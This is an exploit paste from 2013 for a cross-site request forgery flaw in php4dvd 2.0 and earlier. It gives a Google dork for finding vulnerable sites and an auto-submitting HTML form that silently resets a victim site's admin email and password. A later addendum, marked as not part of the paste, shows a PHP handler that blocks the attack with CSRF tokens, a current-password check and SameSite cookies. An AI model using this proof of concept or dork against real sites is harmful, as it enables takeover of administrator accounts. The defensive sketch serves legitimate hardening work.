7days

php4dvd <= 2.0 CSRF

Jun 6th, 2013
#########################################################################

[+] Exploit Title : php4dvd <= 2.0 CSRF
[+] Author : Pablo '7days' Riberio
[+] Team: So Good Security
[+] Other 0days : http://pastebin.com/u/7days
[+] Version : <= 2.0
[+] Tested on : windows/internet explorer
[+] Details: Reset admin password via CSRF
[+] Vendor: http://php4dvd.sourceforge.net
[+] Duck : inurl:php4dvd/?go=profile
#########################################################################

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Gr33tz: Greg, Sonya from Mortal Kombat, the owner of the japanese steak creation factory,
my home boy linus, all the cockneys and my grandma <3
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
no thnx 2: microsoft, windoz, estate agents and recruiters
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

portuguese cyber army
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] Begin 0day
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

<html>
<head>
</head>
<body>
<!-- php4dvd csrf -->

<form action="http://www.victim.com/php4dvd/?go=profile" method="POST" id="csrf" name="csrf" onload="go()">
<input type="hidden" name="email" value="0wnedx@0wned.comx" />
<input type="hidden" name="password" value="0wned" />
<input type="hidden" name="password2" value="0wned" />
<input type="submit" name="submit" value="Save" />
</form>

<script language="JavaScript" type="text/javascript">
document.csrf.submit();
</script>
</body>

</html>

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
[+] End 0day
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
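
Added example (not part of the original paste and not php4dvd's own code): the form above succeeds because the profile POST carries nothing an off-site page cannot supply, so this sketch shows a handler that rejects it. The email, password and password2 fields come from the paste; the csrf_token and current_password fields and all function names are assumptions.

```php
<?php
declare(strict_types=1);
// Added example, not php4dvd code. email/password/password2 are the form's
// fields; csrf_token, current_password and every function name are assumptions.

function field(array $src, string $key): string
{
    // Treat missing or non-string (e.g. array) input as empty.
    return isset($src[$key]) && is_string($src[$key]) ? $src[$key] : '';
}

function issue_csrf_token(array &$session): string
{
    // One unpredictable token per session, rendered as a hidden form field.
    if (field($session, 'csrf_token') === '') {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

function handle_profile_update(array $post, array $session, string $storedHash): array
{
    $expected = field($session, 'csrf_token');
    // A cross-site page cannot read the session token, so a forged POST fails here.
    if ($expected === '' || !hash_equals($expected, field($post, 'csrf_token'))) {
        return [403, 'missing or invalid CSRF token'];
    }
    $new = field($post, 'password');
    if ($new !== '') {
        if ($new !== field($post, 'password2')) {
            return [400, 'passwords do not match'];
        }
        // Second layer: a credential change needs the current password.
        if (!password_verify(field($post, 'current_password'), $storedHash)) {
            return [403, 'current password required'];
        }
    }
    return [200, 'profile updated'];
}

// Constructed demo; in the application these arrays are $_POST and $_SESSION.
$session = [];
$token = issue_csrf_token($session);
$hash = password_hash('old-secret', PASSWORD_DEFAULT);
$forged = ['email' => 'a@example.test', 'password' => 'x', 'password2' => 'x'];
$genuine = $forged + ['csrf_token' => $token, 'current_password' => 'old-secret'];
echo implode(' ', handle_profile_update($forged, $session, $hash)), "\n";
echo implode(' ', handle_profile_update($genuine, $session, $hash)), "\n";
```

Setting the session cookie's SameSite attribute to Lax or Strict adds a browser-side layer, since the cookie is then withheld from cross-site POSTs like the one above.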